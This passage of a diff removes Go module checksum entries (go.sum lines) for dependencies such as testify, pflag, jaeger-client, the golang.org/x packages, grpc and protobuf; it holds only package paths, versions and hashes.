-github.com/smartystreets/assertions v1.1.1/go.mod h1:tcbTF8ujkAEcZ8TElKY+i30BzYlVhC/LOxJk7iOWnoo=
-github.com/smartystreets/goconvey v1.6.4/go.mod h1:syvi0/a8iFYH4r/RixwvyeAJjdLS9QV7WQ/tjFTllLA=
-github.com/sony/gobreaker v0.4.1 h1:oMnRNZXX5j85zso6xCPRNPtmAycat+WcoKbklScLDgQ=
-github.com/sony/gobreaker v0.4.1/go.mod h1:ZKptC7FHNvhBz7dN2LGjPVBz2sZJmc0/PkyDJOjmxWY=
-github.com/spf13/afero v1.2.2/go.mod h1:9ZxEEn6pIJ8Rxe320qSDBk6AsU0r9pR7Q4OcevTdifk=
-github.com/spf13/pflag v0.0.0-20170130214245-9ff6c6923cff/go.mod h1:DYY7MBk1bdzusC3SYhjObp+wFpr4gzcvqqNjLnInEg4=
-github.com/spf13/pflag v1.0.5 h1:iy+VFUOCP1a+8yFto/drg2CJ5u0yRoB7fZw3DKv/JXA=
-github.com/spf13/pflag v1.0.5/go.mod h1:McXfInJRrz4CZXVZOBLb0bTZqETkiAhM9Iw0y3An2Bg=
-github.com/stretchr/objx v0.1.0/go.mod h1:HFkY916IF+rwdDfMAkV7OtwuqBVzrE8GR6GFx+wExME=
-github.com/stretchr/objx v0.1.1/go.mod h1:HFkY916IF+rwdDfMAkV7OtwuqBVzrE8GR6GFx+wExME=
-github.com/stretchr/objx v0.2.0/go.mod h1:qt09Ya8vawLte6SNmTgCsAVtYtaKzEcn8ATUoHMkEqE=
-github.com/stretchr/testify v1.2.2/go.mod h1:a8OnRcib4nhh0OaRAV+Yts87kKdq0PP7pXfy6kDkUVs=
-github.com/stretchr/testify v1.3.0/go.mod h1:M5WIy9Dh21IEIfnGCwXGc5bZfKNJtfHm1UVUgZn+9EI=
-github.com/stretchr/testify v1.4.0/go.mod h1:j7eGeouHqKxXV5pUuKE4zz7dFj8WfuZ+81PSLYec5m4=
-github.com/stretchr/testify v1.6.1 h1:hDPOHmpOpP40lSULcqw7IrRb/u7w6RpDC9399XyoNd0=
-github.com/stretchr/testify v1.6.1/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg=
-github.com/szuecs/rate-limit-buffer v0.7.1 h1:kpVLwDvpCTFQi8uhiXQrhAKWzNUaEKhArFdjb4GQ8F4=
-github.com/szuecs/rate-limit-buffer v0.7.1/go.mod h1:BxqrsmnHsCnWcvbtdcaDLEBmjNEvRFU5LQ8edoZ9B0M=
-github.com/szuecs/routegroup-client v0.17.7 h1:kwFU9/r4yiWnk+DKox367EO25JsKfdFdJMREduWWKgs=
-github.com/szuecs/routegroup-client v0.17.7/go.mod h1:lHgfovfWP6h6zQoWjVmhUWYrSa62yXstI3uCtgTdTuk=
-github.com/tidwall/gjson v1.7.4 h1:19cchw8FOxkG5mdLRkGf9jqIqEyqdZhPqW60XfyFxk8=
-github.com/tidwall/gjson v1.7.4/go.mod h1:5/xDoumyyDNerp2U36lyolv46b3uF/9Bu6OfyQ9GImk=
-github.com/tidwall/match v1.0.3 h1:FQUVvBImDutD8wJLN6c5eMzWtjgONK9MwIBCOrUJKeE=
-github.com/tidwall/match v1.0.3/go.mod h1:eRSPERbgtNPcGhD8UCthc6PmLEQXEWd3PRB5JTxsfmM=
-github.com/tidwall/pretty v1.1.0 h1:K3hMW5epkdAVwibsQEfR/7Zj0Qgt4DxtNumTq/VloO8=
-github.com/tidwall/pretty v1.1.0/go.mod h1:XNkn88O1ChpSDQmQeStsy+sBenx6DDtFZJxhVysOjyk=
-github.com/tklauser/go-sysconf v0.3.5 h1:uu3Xl4nkLzQfXNsWn15rPc/HQCJKObbt1dKJeWp3vU4=
-github.com/tklauser/go-sysconf v0.3.5/go.mod h1:MkWzOF4RMCshBAMXuhXJs64Rte09mITnppBXY/rYEFI=
-github.com/tklauser/numcpus v0.2.2 h1:oyhllyrScuYI6g+h/zUvNXNp1wy7x8qQy3t/piefldA=
-github.com/tklauser/numcpus v0.2.2/go.mod h1:x3qojaO3uyYt0i56EW/VUYs7uBvdl2fkfZFu0T9wgjM=
-github.com/uber-go/atomic v1.4.0 h1:yOuPqEq4ovnhEjpHmfFwsqBXDYbQeT6Nb0bwD6XnD5o=
-github.com/uber-go/atomic v1.4.0/go.mod h1:/Ct5t2lcmbJ4OSe/waGBoaVvVqtO0bmtfVNex1PFV8g=
-github.com/uber/jaeger-client-go v2.16.0+incompatible h1:Q2Pp6v3QYiocMxomCaJuwQGFt7E53bPYqEgug/AoBtY=
-github.com/uber/jaeger-client-go v2.16.0+incompatible/go.mod h1:WVhlPFC8FDjOFMMWRy2pZqQJSXxYSwNYOkTr/Z6d3Kk=
-github.com/uber/jaeger-lib v2.0.0+incompatible h1:iMSCV0rmXEogjNWPh2D0xk9YVKvrtGoHJNe9ebLu/pw=
-github.com/uber/jaeger-lib v2.0.0+incompatible/go.mod h1:ComeNDZlWwrWnDv8aPp0Ba6+uUTzImX/AauajbLI56U=
-github.com/yookoala/gofast v0.6.0 h1:E5x2acfUD7GkzCf8bmIMwnV10VxDy5tUCHc5LGhluwc=
-github.com/yookoala/gofast v0.6.0/go.mod h1:OJU201Q6HCaE1cASckaTbMm3KB6e0cZxK0mgqfwOKvQ=
-github.com/yuin/goldmark v1.1.27/go.mod h1:3hX8gzYuyVAZsxl0MRgGTJEmQBFcNTphYh9decYSb74=
-github.com/yuin/goldmark v1.2.1/go.mod h1:3hX8gzYuyVAZsxl0MRgGTJEmQBFcNTphYh9decYSb74=
-github.com/yuin/gopher-lua v0.0.0-20200603152657-dc2b0ca8b37e h1:oIpIX9VKxSCFrfjsKpluGbNPBGq9iNnT9crH781j9wY=
-github.com/yuin/gopher-lua v0.0.0-20200603152657-dc2b0ca8b37e/go.mod h1:gqRgreBUhTSL0GeU64rtZ3Uq3wtjOa/TB2YfrtkCbVQ=
-go.opencensus.io v0.21.0/go.mod h1:mSImk1erAIZhrmZN+AvHh14ztQfjbGwt4TtuofqLduU=
-go.opencensus.io v0.22.3/go.mod h1:yxeiOL68Rb0Xd1ddK5vPZ/oVn4vY4Ynel7k9FzqtOIw=
-go.opentelemetry.io/otel v0.13.0 h1:2isEnyzjjJZq6r2EKMsFj4TxiQiexsM04AVhwbR/oBA=
-go.opentelemetry.io/otel v0.13.0/go.mod h1:dlSNewoRYikTkotEnxdmuBHgzT+k/idJSfDv/FxEnOY=
-go.uber.org/atomic v1.4.0 h1:cxzIVoETapQEqDhQu3QfnvXAV4AlzcvUCxkVUFw3+EU=
-go.uber.org/atomic v1.4.0/go.mod h1:gD2HeocX3+yG+ygLZcrzQJaqmWj9AIm7n08wl/qW/PE=
-golang.org/x/crypto v0.0.0-20180904163835-0709b304e793/go.mod h1:6SG95UA2DQfeDnfUPMdvaQW0Q7yPrPDi9nlGo2tz2b4=
-golang.org/x/crypto v0.0.0-20181029021203-45a5f77698d3/go.mod h1:6SG95UA2DQfeDnfUPMdvaQW0Q7yPrPDi9nlGo2tz2b4=
-golang.org/x/crypto v0.0.0-20190211182817-74369b46fc67/go.mod h1:6SG95UA2DQfeDnfUPMdvaQW0Q7yPrPDi9nlGo2tz2b4=
-golang.org/x/crypto v0.0.0-20190308221718-c2843e01d9a2/go.mod h1:djNgcEr1/C05ACkg1iLfiJU5Ep61QUkGW8qpdssI0+w=
-golang.org/x/crypto v0.0.0-20190611184440-5c40567a22f8/go.mod h1:yigFU9vqHzYiE8UmvKecakEJjdnWj3jj499lnFckfCI=
-golang.org/x/crypto v0.0.0-20191011191535-87dc89f01550/go.mod h1:yigFU9vqHzYiE8UmvKecakEJjdnWj3jj499lnFckfCI=
-golang.org/x/crypto v0.0.0-20200220183623-bac4c82f6975/go.mod h1:LzIPMQfyMNhhGPhUkYOs5KpL4U8rLKemX1yGLhDgUto=
-golang.org/x/crypto v0.0.0-20200622213623-75b288015ac9 h1:psW17arqaxU48Z5kZ0CQnkZWQJsqcURM6tKiBApRjXI=
-golang.org/x/crypto v0.0.0-20200622213623-75b288015ac9/go.mod h1:LzIPMQfyMNhhGPhUkYOs5KpL4U8rLKemX1yGLhDgUto=
-golang.org/x/exp v0.0.0-20190121172915-509febef88a4/go.mod h1:CJ0aWSM057203Lf6IL+f9T1iT9GByDxfZKAQTCR3kQA=
-golang.org/x/exp v0.0.0-20190125153040-c74c464bbbf2/go.mod h1:CJ0aWSM057203Lf6IL+f9T1iT9GByDxfZKAQTCR3kQA=
-golang.org/x/exp v0.0.0-20190312203227-4b39c73a6495/go.mod h1:ZjyILWgesfNpC6sMxTJOJm9Kp84zZh5NQWvqDGG3Qr8=
-golang.org/x/image v0.0.0-20190227222117-0694c2d4d067/go.mod h1:kZ7UVZpmo3dzQBMxlp+ypCbDeSB+sBbTgSJuh5dn5js=
-golang.org/x/lint v0.0.0-20181026193005-c67002cb31c3/go.mod h1:UVdnD1Gm6xHRNCYTkRU2/jEulfH38KcIWyp/GAMgvoE=
-golang.org/x/lint v0.0.0-20190227174305-5b3e6a55c961/go.mod h1:wehouNa3lNwaWXcvxsM5YxQ5yQlVC4a0KAMCusXpPoU=
-golang.org/x/lint v0.0.0-20190301231843-5614ed5bae6f/go.mod h1:UVdnD1Gm6xHRNCYTkRU2/jEulfH38KcIWyp/GAMgvoE=
-golang.org/x/lint v0.0.0-20190313153728-d0100b6bd8b3/go.mod h1:6SW0HCj/g11FgYtHlgUYUwCkIfeOF89ocIRzGO/8vkc=
-golang.org/x/mobile v0.0.0-20190312151609-d3739f865fa6/go.mod h1:z+o9i4GpDbdi3rU15maQ/Ox0txvL9dWGYEHz965HBQE=
-golang.org/x/mod v0.2.0/go.mod h1:s0Qsj1ACt9ePp/hMypM3fl4fZqREWJwdYDEqhRiZZUA=
-golang.org/x/mod v0.3.0/go.mod h1:s0Qsj1ACt9ePp/hMypM3fl4fZqREWJwdYDEqhRiZZUA=
-golang.org/x/net v0.0.0-20170114055629-f2499483f923/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4=
-golang.org/x/net v0.0.0-20180724234803-3673e40ba225/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4=
-golang.org/x/net v0.0.0-20180826012351-8a410e7b638d/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4=
-golang.org/x/net v0.0.0-20180906233101-161cd47e91fd/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4=
-golang.org/x/net v0.0.0-20181023162649-9b4f9f5ad519/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4=
-golang.org/x/net v0.0.0-20181114220301-adae6a3d119a/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4=
-golang.org/x/net v0.0.0-20190108225652-1e06a53dbb7e/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4=
-golang.org/x/net v0.0.0-20190213061140-3a22650c66bd/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4=
-golang.org/x/net v0.0.0-20190311183353-d8887717615a/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg=
-golang.org/x/net v0.0.0-20190404232315-eb5bcb51f2a3/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg=
-golang.org/x/net v0.0.0-20190613194153-d28f0bde5980/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s=
-golang.org/x/net v0.0.0-20190620200207-3b0461eec859/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s=
-golang.org/x/net v0.0.0-20190827160401-ba9fcec4b297/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s=
-golang.org/x/net v0.0.0-20191004110552-13f9640d40b9/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s=
-golang.org/x/net v0.0.0-20200226121028-0de0cce0169b/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s=
-golang.org/x/net v0.0.0-20200520004742-59133d7f0dd7/go.mod h1:qpuaurCH72eLCgpAm/N6yyVIVM9cpaDIP3A8BGJEC5A=
-golang.org/x/net v0.0.0-20200528225125-3c3fba18258b/go.mod h1:qpuaurCH72eLCgpAm/N6yyVIVM9cpaDIP3A8BGJEC5A=
-golang.org/x/net v0.0.0-20200822124328-c89045814202/go.mod h1:/O7V0waA8r7cgGh81Ro3o1hOxt32SMVPicZroKQ2sZA=
-golang.org/x/net v0.0.0-20201006153459-a7d1128ccaa0/go.mod h1:sp8m0HH+o8qH0wwXwYZr8TS3Oi6o0r6Gce1SSxlDquU=
-golang.org/x/net v0.0.0-20201021035429-f5854403a974/go.mod h1:sp8m0HH+o8qH0wwXwYZr8TS3Oi6o0r6Gce1SSxlDquU=
-golang.org/x/net v0.0.0-20210226172049-e18ecbb05110/go.mod h1:m0MpNAwzfU5UDzcl9v0D8zg8gWTRqZa9RBIspLL5mdg=
-golang.org/x/net v0.0.0-20210415231046-e915ea6b2b7d h1:BgJvlyh+UqCUaPlscHJ+PN8GcpfrFdr7NHjd1JL0+Gs=
-golang.org/x/net v0.0.0-20210415231046-e915ea6b2b7d/go.mod h1:9tjilg8BloeKEkVJvy7fQ90B1CfIiPueXVOjqfkSzI8=
-golang.org/x/oauth2 v0.0.0-20180821212333-d2e6202438be/go.mod h1:N/0e6XlmueqKjAGxoOufVs8QHGRruUQn6yWY3a++T0U=
-golang.org/x/oauth2 v0.0.0-20190226205417-e64efc72b421/go.mod h1:gOpvHmFTYa4IltrdGE7lF6nIHvwfUNPOp7c8zoXwtLw=
-golang.org/x/oauth2 v0.0.0-20190604053449-0f29369cfe45 h1:SVwTIAaPC2U/AvvLNZ2a7OVsmBpC8L5BlwK1whH3hm0=
-golang.org/x/oauth2 v0.0.0-20190604053449-0f29369cfe45/go.mod h1:gOpvHmFTYa4IltrdGE7lF6nIHvwfUNPOp7c8zoXwtLw=
-golang.org/x/sync v0.0.0-20180314180146-1d60e4601c6f/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM=
-golang.org/x/sync v0.0.0-20181108010431-42b317875d0f/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM=
-golang.org/x/sync v0.0.0-20181221193216-37e7f081c4d4/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM=
-golang.org/x/sync v0.0.0-20190227155943-e225da77a7e6/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM=
-golang.org/x/sync v0.0.0-20190423024810-112230192c58/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM=
-golang.org/x/sync v0.0.0-20190911185100-cd5d95a43a6e/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM=
-golang.org/x/sync v0.0.0-20200625203802-6e8e738ad208/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM=
-golang.org/x/sync v0.0.0-20201020160332-67f06af15bc9/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM=
-golang.org/x/sync v0.0.0-20210220032951-036812b2e83c h1:5KslGYwFpkhGh+Q16bwMP3cOontH8FOep7tGV86Y7SQ=
-golang.org/x/sync v0.0.0-20210220032951-036812b2e83c/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM=
-golang.org/x/sys v0.0.0-20170830134202-bb24a47a89ea/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY=
-golang.org/x/sys v0.0.0-20180830151530-49385e6e1522/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY=
-golang.org/x/sys v0.0.0-20180905080454-ebe1bf3edb33/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY=
-golang.org/x/sys v0.0.0-20180909124046-d0be0721c37e/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY=
-golang.org/x/sys v0.0.0-20181026203630-95b1ffbd15a5/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY=
-golang.org/x/sys v0.0.0-20181116152217-5ac8a444bdc5/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY=
-golang.org/x/sys v0.0.0-20190204203706-41f3e6584952/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY=
-golang.org/x/sys v0.0.0-20190209173611-3b5209105503/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY=
-golang.org/x/sys v0.0.0-20190215142949-d0b11bdaac8a/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY=
-golang.org/x/sys v0.0.0-20190312061237-fead79001313/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
-golang.org/x/sys v0.0.0-20190412213103-97732733099d/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
-golang.org/x/sys v0.0.0-20190422165155-953cdadca894/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
-golang.org/x/sys v0.0.0-20190502145724-3ef323f4f1fd/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
-golang.org/x/sys v0.0.0-20190616124812-15dcb6c0061f/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
-golang.org/x/sys v0.0.0-20190826190057-c7b8b68b1456/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
-golang.org/x/sys v0.0.0-20190904154756-749cb33beabd/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
-golang.org/x/sys v0.0.0-20191005200804-aed5e4c7ecf9/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
-golang.org/x/sys v0.0.0-20191022100944-742c48ecaeb7/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
-golang.org/x/sys v0.0.0-20191120155948-bd437916bb0e/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
-golang.org/x/sys v0.0.0-20200323222414-85ca7c5b95cd/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
-golang.org/x/sys v0.0.0-20200519105757-fe76b779f299/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
-golang.org/x/sys v0.0.0-20200523222454-059865788121/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
-golang.org/x/sys v0.0.0-20200930185726-fdedc70b468f/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
-golang.org/x/sys v0.0.0-20201119102817-f84b799fce68/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
-golang.org/x/sys v0.0.0-20210119212857-b64e53b001e4/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
-golang.org/x/sys v0.0.0-20210303074136-134d130e1a04/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
-golang.org/x/sys v0.0.0-20210316164454-77fc1eacc6aa/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
-golang.org/x/sys v0.0.0-20210330210617-4fbd30eecc44/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
-golang.org/x/sys v0.0.0-20210415045647-66c3f260301c h1:6L+uOeS3OQt/f4eFHXZcTxeZrGCuz+CLElgEBjbcTA4=
-golang.org/x/sys v0.0.0-20210415045647-66c3f260301c/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
-golang.org/x/term v0.0.0-20201126162022-7de9c90e9dd1/go.mod h1:bj7SfCRtBDWHUb9snDiAeCFNEtKQo2Wmx5Cou7ajbmo=
-golang.org/x/text v0.0.0-20160726164857-2910a502d2bf/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ=
-golang.org/x/text v0.3.0/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ=
-golang.org/x/text v0.3.1-0.20180807135948-17ff2d5776d2/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ=
-golang.org/x/text v0.3.2/go.mod h1:bEr9sfX3Q8Zfm5fL9x+3itogRgK3+ptLWKqgva+5dAk=
-golang.org/x/text v0.3.3/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ=
-golang.org/x/text v0.3.6 h1:aRYxNxv6iGQlyVaZmk6ZgYEDa+Jg18DxebPSrd6bg1M=
-golang.org/x/text v0.3.6/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ=
-golang.org/x/time v0.0.0-20181108054448-85acf8d2951c/go.mod h1:tRJNPiyCQ0inRvYxbN9jk5I+vvW/OXSQhTDSoE431IQ=
-golang.org/x/time v0.0.0-20190308202827-9d24e82272b4/go.mod h1:tRJNPiyCQ0inRvYxbN9jk5I+vvW/OXSQhTDSoE431IQ=
-golang.org/x/tools v0.0.0-20180917221912-90fa682c2a6e/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ=
-golang.org/x/tools v0.0.0-20181011042414-1f849cf54d09/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ=
-golang.org/x/tools v0.0.0-20181030221726-6c7e314b6563/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ=
-golang.org/x/tools v0.0.0-20190114222345-bf090417da8b/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ=
-golang.org/x/tools v0.0.0-20190206041539-40960b6deb8e/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ=
-golang.org/x/tools v0.0.0-20190226205152-f727befe758c/go.mod h1:9Yl7xja0Znq3iFh3HoIrodX9oNMXvdceNzlUR8zjMvY=
-golang.org/x/tools v0.0.0-20190311212946-11955173bddd/go.mod h1:LCzVGOaR6xXOjkQ3onu1FJEFr0SW1gC7cKk1uF8kGRs=
-golang.org/x/tools v0.0.0-20190312151545-0bb0c0a6e846/go.mod h1:LCzVGOaR6xXOjkQ3onu1FJEFr0SW1gC7cKk1uF8kGRs=
-golang.org/x/tools v0.0.0-20190312170243-e65039ee4138/go.mod h1:LCzVGOaR6xXOjkQ3onu1FJEFr0SW1gC7cKk1uF8kGRs=
-golang.org/x/tools v0.0.0-20190328211700-ab21143f2384/go.mod h1:LCzVGOaR6xXOjkQ3onu1FJEFr0SW1gC7cKk1uF8kGRs=
-golang.org/x/tools v0.0.0-20190524140312-2c0ae7006135/go.mod h1:RgjU9mgBXZiqYHBnxXauZ1Gv1EHHAz9KjViQ78xBX0Q=
-golang.org/x/tools v0.0.0-20190614205625-5aca471b1d59/go.mod h1:/rFqwRUd4F7ZHNgwSSTFct+R/Kf4OFW1sUzUTQQTgfc=
-golang.org/x/tools v0.0.0-20190920225731-5eefd052ad72/go.mod h1:b+2E5dAYhXwXZwtnZ6UAqBI28+e2cm9otk0dWdXHAEo=
-golang.org/x/tools v0.0.0-20191119224855-298f0cb1881e/go.mod h1:b+2E5dAYhXwXZwtnZ6UAqBI28+e2cm9otk0dWdXHAEo=
-golang.org/x/tools v0.0.0-20200619180055-7c47624df98f/go.mod h1:EkVYQZoAsY45+roYkvgYkIh4xh/qjgUK9TdY2XT94GE=
-golang.org/x/tools v0.0.0-20200908211811-12e1bf57a112/go.mod h1:Cj7w3i3Rnn0Xh82ur9kSqwfTHTeVxaDqrfMjpcNT6bE=
-golang.org/x/tools v0.0.0-20210106214847-113979e3529a/go.mod h1:emZCQorbCU4vsT4fOWvOPXz4eW1wZW4PmDk9uLelYpA=
-golang.org/x/tools v0.1.0 h1:po9/4sTYwZU9lPhi1tOrb4hCv3qrhiQ77LZfGa2OjwY=
-golang.org/x/tools v0.1.0/go.mod h1:xkSsbof2nBLbhDlRMhhhyNLN/zl3eTqcnHD5viDpcZ0=
-golang.org/x/xerrors v0.0.0-20190717185122-a985d3407aa7/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0=
-golang.org/x/xerrors v0.0.0-20191011141410-1b5146add898/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0=
-golang.org/x/xerrors v0.0.0-20191204190536-9bdfabe68543/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0=
-golang.org/x/xerrors v0.0.0-20200804184101-5ec99f83aff1 h1:go1bK/D/BFZV2I8cIQd1NKEZ+0owSTG1fDTci4IqFcE=
-golang.org/x/xerrors v0.0.0-20200804184101-5ec99f83aff1/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0=
-gonum.org/v1/gonum v0.0.0-20190331200053-3d26580ed485/go.mod h1:2ltnJ7xHfj0zHS40VVPYEAAMTa3ZGguvHGBSJeRWqE0=
-gonum.org/v1/netlib v0.0.0-20190313105609-8cb42192e0e0/go.mod h1:wa6Ws7BG/ESfp6dHfk7C6KdzKA7wR7u/rKwOGE66zvw=
-gonum.org/v1/netlib v0.0.0-20190331212654-76723241ea4e/go.mod h1:kS+toOQn6AQKjmKJ7gzohV1XkqsFehRA2FbsbkopSuQ=
-google.golang.org/api v0.4.0/go.mod h1:8k5glujaEP+g9n7WNsDg8QP6cUVNI86fCNMcbazEtwE=
-google.golang.org/appengine v1.1.0/go.mod h1:EbEs0AVv82hx2wNQdGPgUI5lhzA/G0D9YwlJXL52JkM=
-google.golang.org/appengine v1.4.0/go.mod h1:xpcJRLb0r/rnEns0DIKYYv+WjYCduHsrkT7/EB5XEv4=
-google.golang.org/appengine v1.5.0 h1:KxkO13IPW4Lslp2bz+KHP2E3gtFlrIGNThxkZQ3g+4c=
-google.golang.org/appengine v1.5.0/go.mod h1:xpcJRLb0r/rnEns0DIKYYv+WjYCduHsrkT7/EB5XEv4=
-google.golang.org/genproto v0.0.0-20180817151627-c66870c02cf8/go.mod h1:JiN7NxoALGmiZfu7CAH4rXhgtRTLTxftemlI0sWmxmc=
-google.golang.org/genproto v0.0.0-20190307195333-5fe7a883aa19/go.mod h1:VzzqZJRnGkLBvHegQrXjBqPurQTc5/KpmUdxsrq26oE=
-google.golang.org/genproto v0.0.0-20190418145605-e7d98fc518a7/go.mod h1:VzzqZJRnGkLBvHegQrXjBqPurQTc5/KpmUdxsrq26oE=
-google.golang.org/genproto v0.0.0-20190425155659-357c62f0e4bb/go.mod h1:VzzqZJRnGkLBvHegQrXjBqPurQTc5/KpmUdxsrq26oE=
-google.golang.org/genproto v0.0.0-20190530194941-fb225487d101 h1:wuGevabY6r+ivPNagjUXGGxF+GqgMd+dBhjsxW4q9u4=
-google.golang.org/genproto v0.0.0-20190530194941-fb225487d101/go.mod h1:z3L6/3dTEVtUr6QSP8miRzeRqwQOioJ9I66odjN4I7s=
-google.golang.org/grpc v1.19.0/go.mod h1:mqu4LbDTu4XGKhr4mRzUsmM4RtVoemTSY81AxZiDr8c=
-google.golang.org/grpc v1.20.1/go.mod h1:10oTOabMzJvdu6/UiuZezV6QK5dSlG84ov/aaiqXj38=
-google.golang.org/grpc v1.21.0/go.mod h1:oYelfM1adQP15Ek0mdvEgi9Df8B9CZIaU1084ijfRaM=
-google.golang.org/grpc v1.22.0 h1:J0UbZOIrCAl+fpTOf8YLs4dJo8L/owV4LYVtAXQoPkw=
-google.golang.org/grpc v1.22.0/go.mod h1:Y5yQAOtifL1yxbo5wqy6BxZv8vAUGQwXBOALyacEbxg=
-google.golang.org/protobuf v0.0.0-20200109180630-ec00e32a8dfd/go.mod h1:DFci5gLYBciE7Vtevhsrf46CRTquxDuWsQurQQe4oz8=
-google.golang.org/protobuf v0.0.0-20200221191635-4d8936d0db64/go.mod h1:kwYJMbMJ01Woi6D6+Kah6886xMZcty6N08ah7+eCXa0=
-google.golang.org/protobuf v0.0.0-20200228230310-ab0ca4ff8a60/go.mod h1:cfTl7dwQJ+fmap5saPgwCLgHXTUD7jkjRqWcaiX5VyM=
-google.golang.org/protobuf v1.20.1-0.20200309200217-e05f789c0967/go.mod h1:A+miEFZTKqfCUM6K7xSMQL9OKL/b6hQv+e19PK+JZNE=
-google.golang.org/protobuf v1.21.0/go.mod h1:47Nbq4nVaFHyn7ilMalzfO3qCViNmqZ2kzikPIcrTAo=
-google.golang.org/protobuf v1.23.0 h1:4MY060fB1DLGMB/7MBTLnwQUY6+F09GEiz6SsrNqyzM=
